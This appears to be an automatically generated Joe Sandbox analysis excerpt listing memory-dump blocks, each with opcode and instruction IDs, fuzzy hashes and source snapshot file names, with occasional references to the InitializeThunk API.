                                                                              • Instruction Fuzzy Hash: BB31D431A0152CABDF31DB18DC85FEEF7B9AB15740F0101A1F645A72A0DA74AE848F90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                              • Instruction ID: dfd08e9f4ae59979ec7868df03b0cdf58cbd20c2858de5497defdde3b054ae27
                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                              • Instruction Fuzzy Hash: A3216D72A00609EBCB15CF58C984A8AFBB5FF48714F108069EE179B685D671EA058B90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b5fb45270eb66ee9cbc363da760ad45e27bc11fa5302e793df8acd74147295a
                                                                              • Instruction ID: a0e2ccb127f626f976b24aad3cc4268fca4573e05aba4480e924ab77b60dafee
                                                                              • Opcode Fuzzy Hash: 9b5fb45270eb66ee9cbc363da760ad45e27bc11fa5302e793df8acd74147295a
                                                                              • Instruction Fuzzy Hash: 5821C3726047499BCB21CF18C880B6BB7F4FF88760F504529FD569BA45D730EA008FA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                              • Instruction ID: fdaba4b0ef3c2a31809c702bbb1134f3321a418fafaad3c3a0d6abfc19f7ab67
                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                              • Instruction Fuzzy Hash: 97318931600605EFEB21CFA8D884F6AB7F9EF45354F1445A9E652CB290EB30EE45CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                                              • Instruction ID: 0633480eed3b87be57a8ef2646822a9e7b6172851f0a8fb7400e27ee3dac900a
                                                                              • Opcode Fuzzy Hash: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                                              • Instruction Fuzzy Hash: E6316B76A00205DFCB19CF18C884DAEB7B9EF84304F554859EC09DB399E731AA40CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                              • Instruction ID: 9812914dc1aa567e762058e0e5ec0c629f9c066732bc0f692d941973b99d47cd
                                                                              • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                              • Instruction Fuzzy Hash: A5214832601A499BE7279B2CCC8CB65B7B6AF84754F0A05A0ED02C76D2E3B4DE80C251
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              • API String ID:
                                                                              • Opcode ID: afc0cfa68ae391390003ab5cc770bda80652b482e32006e17c5e7a193abded47
                                                                              • Instruction ID: cdf9a0e13d13f5be9b909938910a04b860436d6c929404080bc8ad1371b12c00
                                                                              • Opcode Fuzzy Hash: afc0cfa68ae391390003ab5cc770bda80652b482e32006e17c5e7a193abded47
                                                                              • Instruction Fuzzy Hash: F1019E715001099FC726DF29D448F2AFBF9EB85718F28826EE1058B664DB70EE46CF90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                              • Instruction ID: d748d795739755056bc5b29609cd2e5de92c95277ec1fa7a028b3651a61eced3
                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                              • Instruction Fuzzy Hash: 0A11E9712016C59FE7339B1CDD44B65BB94BB50B48F1904E4DF41C7682F738C981C250
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                              • Instruction ID: 66fbd43399efcb0971c323fc8a80566ef347a86d612c4cc47257414809355bc6
                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                              • Instruction Fuzzy Hash: 4C01D232600125AFEB239F58C844FAABBA9EB84754F158024EE05DB260E771DE80C794
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                              • Instruction ID: e9ae5806e92660c0e8d3dae7679b1c6d26ee0eed2ea5e80e8367e46a2516e4fc
                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                              • Instruction Fuzzy Hash: 4001C47150A7219BCF218F19A840A66BBF5EB9976070085ADF9958B681D731D404CB60
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 30fa772055900c4b09a1d0ecd042236904c955fec834fdbe35de60aa71904a3b
                                                                              • Instruction ID: d54f00ab53f0be932200f0bebd31c4bd7bc305e43204c18306d89b517afc685f
                                                                              • Opcode Fuzzy Hash: 30fa772055900c4b09a1d0ecd042236904c955fec834fdbe35de60aa71904a3b
                                                                              • Instruction Fuzzy Hash: 4B11CE32241201EFCB16AF09CC94F46BBB8FF58B84F200064FD058B655C235EE00CA90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef2d17eebf466cdb789e3d40cbbd02b50d903ddf22b2979802567477ea02f727
                                                                              • Instruction ID: 40f51aa61a998fa7d4dcbc4763f9cb424d5ff1292b6488da7f53d7d9a93cfdaa
                                                                              • Opcode Fuzzy Hash: ef2d17eebf466cdb789e3d40cbbd02b50d903ddf22b2979802567477ea02f727
                                                                              • Instruction Fuzzy Hash: AF11A071901218ABDF25EB64CC4AFE8B3B8BF48710F5041D4B314A60E0E7709E81CF84
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 34d654cd3c9f1eab32791a6be6bc1823040b2f955e35cdbbd408bbe7a4d52b8a
                                                                              • Instruction ID: ba2e0d351efe4c0a45b89cd8b99cf5f50459be1fad9f85d41ee435bc33b9350d
                                                                              • Opcode Fuzzy Hash: 34d654cd3c9f1eab32791a6be6bc1823040b2f955e35cdbbd408bbe7a4d52b8a
                                                                              • Instruction Fuzzy Hash: FB111B7290001DABCB12DB94CC84DDFB7BCEF48354F044166E906E7211EA34AA55CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                              • Instruction ID: 6ffbd38436536c96a569adc83c4aa23a0e23423a2c71e912e57d069905390b34
                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                              • Instruction Fuzzy Hash: 2B01F1332001108BEF218A6DD880B93F76BBFC4700F9546A9EE018F24BEA71C881C3A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3dfb25c93a28be97d8a1466b02ff5bee9fdcc05769142836ecb60a8d896cf763
                                                                              • Instruction ID: cc6401d5d234f9c9e9b7042c90b577b6af8641a0869853aac7db9a8625fab750
                                                                              • Opcode Fuzzy Hash: 3dfb25c93a28be97d8a1466b02ff5bee9fdcc05769142836ecb60a8d896cf763
                                                                              • Instruction Fuzzy Hash: F3118272644145AFD711CF5CD440BA5B7B5BB9A314F1C8169F844CB355E731EA41CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ff32cdf9b16454df6db3bf65875e550a5e656ca9229f3d7513c61a0249034d14
                                                                              • Instruction ID: 109e076d0ef34df29dfae76506c700a9532263efe718a9c650d945243edcedc1
                                                                              • Opcode Fuzzy Hash: ff32cdf9b16454df6db3bf65875e550a5e656ca9229f3d7513c61a0249034d14
                                                                              • Instruction Fuzzy Hash: 07111CB1A00219AFCB00DF99D585AAEBBF4FF58350F10806AE905E7355D674EA418BA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b4335aed579438948e089a0afc326aad72fd5d434ab748b229e9ac06d3c71692
                                                                              • Instruction ID: 691f6b282dec4a91d2f79433d6b47df04e67fc5d27044bf3a8b2149b49d6ef4d
                                                                              • Opcode Fuzzy Hash: b4335aed579438948e089a0afc326aad72fd5d434ab748b229e9ac06d3c71692
                                                                              • Instruction Fuzzy Hash: 1E01F5311411159FCB32EE258484E6ABBA9FF61750B14446AE6458B241CF34AD41CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                              • Instruction ID: 3bbe10a6790d95adca1320efab94d9d31ae2471d6cb79447ffba31bcdea67490
                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                              • Instruction Fuzzy Hash: 2801F5321007459FEF3396AED804EA7F7E9FFC5210F14481DA6568B640EA70E445C760
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 74dcbf8307f5a05fb58037c5d5f54d9445a579ca060d352666586e6070bc0c90
                                                                              • Instruction ID: edf6c09b676dfeadf48571259d0bd4089893377b969a0ce381ca8fc3abb2ea0d
                                                                              • Opcode Fuzzy Hash: 74dcbf8307f5a05fb58037c5d5f54d9445a579ca060d352666586e6070bc0c90
                                                                              • Instruction Fuzzy Hash: CB116D75A0124DAFCB05EFA4C858FAEBBF9EB48740F004099E902D7254E635EE51CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6441d039d8e45f283782b50d948a5b89b4d0e2ceb92c0996c1bf8c14808eb94
                                                                              • Instruction ID: 60ea626863b9f816ddcd9b638f678e4fa9d5a8d8dd2a192956340300aca9cb7a
                                                                              • Opcode Fuzzy Hash: b6441d039d8e45f283782b50d948a5b89b4d0e2ceb92c0996c1bf8c14808eb94
                                                                              • Instruction Fuzzy Hash: 6001B172201901BBC311AB69CDC8E93FBACFF557A47100529B205C7555DB24EC01C6A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c4efe7215fe32dbd60fe7318c8f83fa1d48dae48082d1290b18b840b50371362
                                                                              • Instruction ID: bc99a73d49842577504a0e1f88eba721469f3e6d6aa8bec9b04ab970ac10a1f5
                                                                              • Opcode Fuzzy Hash: c4efe7215fe32dbd60fe7318c8f83fa1d48dae48082d1290b18b840b50371362
                                                                              • Instruction Fuzzy Hash: 8001D832214206ABC320DF6DD888DA6FBE8EF98764F254529E959C7180E7309B12C7D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9165d0a21fe1a9f0d1a723aa8cd365c2e6805b0d1391001019ea8b4985117e44
                                                                              • Instruction ID: c1d0ecdc70d3e13b6c5d3ac21254595bc7c27affb6fc21dcfd8266dacbeac0a1
                                                                              • Opcode Fuzzy Hash: 9165d0a21fe1a9f0d1a723aa8cd365c2e6805b0d1391001019ea8b4985117e44
                                                                              • Instruction Fuzzy Hash: 6E115B71A0021DABDB15EF68C884EAEBBB5FB48344F004099F901D7354DB34EA51CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3e13e3ec6e9b09ae6271cd6c0764fe39f72b395aa19833c813bec96357780005
                                                                              • Instruction ID: 456ce743c5963510943ef09efe4cfc9ba414342650897cd57c77e96a77438be2
                                                                              • Opcode Fuzzy Hash: 3e13e3ec6e9b09ae6271cd6c0764fe39f72b395aa19833c813bec96357780005
                                                                              • Instruction Fuzzy Hash: 371179B16083089FC700DF69D445A9BBBE4EF98710F00495AF998D7394E630E910CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                              • Instruction ID: 778652bf19f93ab913ad58114e2ab6cbbe6a9ed10f292e22eeda1e2c0eb54283
                                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                              • Instruction Fuzzy Hash: C701D4322046059FD721AA6DD844F96FBEAFBC6710F044819E642CB694DAB0F980CB94
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0b81d8c906615c304fca3dbd4c811c10a6aa8a8cb02dab9c976ff7dd8d2d096a
                                                                              • Instruction ID: e3fda973c27d22fb555ea3327d1fb1649ccfe02a59a1359fc86dc1556211b01b
                                                                              • Opcode Fuzzy Hash: 0b81d8c906615c304fca3dbd4c811c10a6aa8a8cb02dab9c976ff7dd8d2d096a
                                                                              • Instruction Fuzzy Hash: 0F1179B1608308AFC700DF69D445A5FBBE4FF99750F00895AF958D73A4E630E940CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                              • Instruction ID: 5dab6623c24b48b49ca6971a1e1fcf6c9e80c5844c79a22d76a847c3ba70728d
                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                              • Instruction Fuzzy Hash: 12E0D83224414DABD3311A69C808B66F7B5EBD47A0F160429E242AB958DB70DD40C7D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                              • Instruction ID: 50a965ba540220696490113811e65954d01e4cbd62b95831179b8fd5932d7f74
                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                              • Instruction Fuzzy Hash: 2AE04872640214BBDB2197598D05F9ABEBCDB54F90F154155B601D7194E570DE00D690
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                                              • Instruction ID: 6c44f5c5bf651923b49305e9fb44a8b91baabc4a1739790133fd8edd0fcfc4fd
                                                                              • Opcode Fuzzy Hash: 16c7ac90fe1343e57c981dca993781e7d3055943be8d885d31e8a3f18430bedb
                                                                              • Instruction Fuzzy Hash: 6190023120540802D6807258440464B4005D7D2301F95C029A1025674DCB15CB6D77A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                                              • Instruction ID: 7b1ba6754d4c9ee7960e785b3a3a4b0eb73771e98a04e6f7f10f45b0d8ac4b04
                                                                              • Opcode Fuzzy Hash: ccd6f5adf7ca02485e813d7b512c777e8cacd0287ba305db04cbba12341fcd32
                                                                              • Instruction Fuzzy Hash: 9290023120944842D64072584404A474015D7D1305F55C025A10646B4DD725CF69B762
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                                              • Instruction ID: 087dd9124830e8a1c4a5d9302d7d1a2d3cc7a6d8bcc504a49d59b6f64a263aca
                                                                              • Opcode Fuzzy Hash: 945589cfd30f504241c027f29658d30a075325852dd936988ce3509c489c24b9
                                                                              • Instruction Fuzzy Hash: 6C90023160940802D650725844147474005D7D1301F55C025A1024674DC755CB6977A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                                              • Instruction ID: 7fc8a785a75296ba99d360c0638f0dc041f30bd1febf5c0ff1ae08ac83b5e600
                                                                              • Opcode Fuzzy Hash: 2e61c2a84b38940bfcd98bcf43778a84e57fd024beb8b6e2e567f23edeb32d26
                                                                              • Instruction Fuzzy Hash: 7190023120540802D604725848046874005D7D1301F55C025A7024675ED765CAA57232
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                                              • Instruction ID: c832d196e41a9951aaecbaafad7b9651a6469ddb13cf567fc6fd441ca621e374
                                                                              • Opcode Fuzzy Hash: 040d252a758774bd52df40f0d32eac76b18d1022806777b465545bfed7045daa
                                                                              • Instruction Fuzzy Hash: 9A900225225400020645B658060450B4445E7D7351395C029F24165B0CC721CA795322
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                                              • Instruction ID: ca2ef29ed05e5a28a9142894a2deb963cefc1c507e1fdef0be8db907a2f877b9
                                                                              • Opcode Fuzzy Hash: ab7b6d6fe6a6fba33f0d4efdd410da52bb40a89ca3367f0afcf3404e0f3f3e3f
                                                                              • Instruction Fuzzy Hash: 5D900225215400030605B65807045074046D7D6351355C035F2015570CD721CA755222
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                                              • Instruction ID: 39f898736abb3c8ac36f8f185b0d8b5313997ddfe245d2dd3b24bf2ad4288d22
                                                                              • Opcode Fuzzy Hash: e0b8202cf4e6ae777127fe48a59dd766fe47e3ef3ff27b72428769117c83d1c7
                                                                              • Instruction Fuzzy Hash: D99002A1205540924A00B3588404B0B8505D7E1201B55C02AE2054570CC625CA659236
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                                              • Instruction ID: 50a82235597b351e2992b5d30f079a6bc7014ebe88bb28efa8f4beea9e501ba8
                                                                              • Opcode Fuzzy Hash: 654a72a869c784e80cb4d76bbc623e257ac8b492cc732e9667e48fa780b7a118
                                                                              • Instruction Fuzzy Hash: 5090022130540003D640725854186078005E7E2301F55D025E1414574CDA15CA6A5323
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                                              • Instruction ID: ebff6c630a43aa281a827125bb8981e0712b2e54e7ac38fb2bab17018018985c
                                                                              • Opcode Fuzzy Hash: b529869e3531b0e86a69a12f82021f15a1e36967fd2c8f6e4868fbb6d241d91d
                                                                              • Instruction Fuzzy Hash: CC90022921740002D6807258540860B4005D7D2202F95D429A1015578CCA15CA7D5322
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
